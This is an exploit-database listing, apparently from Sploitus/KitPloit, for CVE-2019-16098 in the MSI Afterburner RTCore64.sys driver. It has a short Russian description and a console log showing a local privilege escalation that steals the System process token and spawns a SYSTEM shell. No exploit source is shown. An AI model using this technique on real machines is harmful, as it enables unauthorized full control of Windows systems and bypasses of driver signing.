Sploitus

Exploit for CVE-2019-16098

kitploit · 2026-09-11

Exploit Code

MARKDOWN34 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BARAKAT-CVE-2019-16098
# CVE-2019-16098

Драйвер в Micro-Star MSI Afterburner 4.6.2.15658 (также известный как RTCore64.sys и RTCore32.sys) позволяет любому аутентифицированному пользователю читать и записывать произвольную память, порты ввода-вывода и MSR. Это может быть использовано для повышения привилегий, выполнения кода с высокими привилегиями и раскрытия информации. Эти подписанные драйверы также могут быть использованы для обхода политики подписания драйверов Microsoft с целью развертывания вредоносного кода.

За дополнительными обновлениями обращайтесь по адресу CVE-2019-16098

**ПРЕДУПРЕЖДЕНИЕ** : Жестко закодированные смещения для Windows 10 x64 версии 1903!

root@kitploit:~
    
    
    Microsoft Windows [Version 10.0.18362.295]
    (c) 2019 Microsoft Corporation. All rights reserved.
    
    C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
    Barakat
    
    C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
    [*] Device object handle has been obtained
    [*] Ntoskrnl base address: FFFFF80734200000
    [*] PsInitialSystemProcess address: FFFFC288A607F300
    [*] System process token: FFFF9703A9E061B0
    [*] Current process address: FFFFC288B7959400
    [*] Current process token: FFFF9703B9D785F0
    [*] Stealing System process token ...
    [*] Spawning new shell ...
    Microsoft Windows [Version 10.0.18362.295]
    (c) 2019 Microsoft Corporation. All rights reserved.
    
    C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
    SYSTEM
    
    C:\Users\Barakat\source\repos\CVE-2019-16098>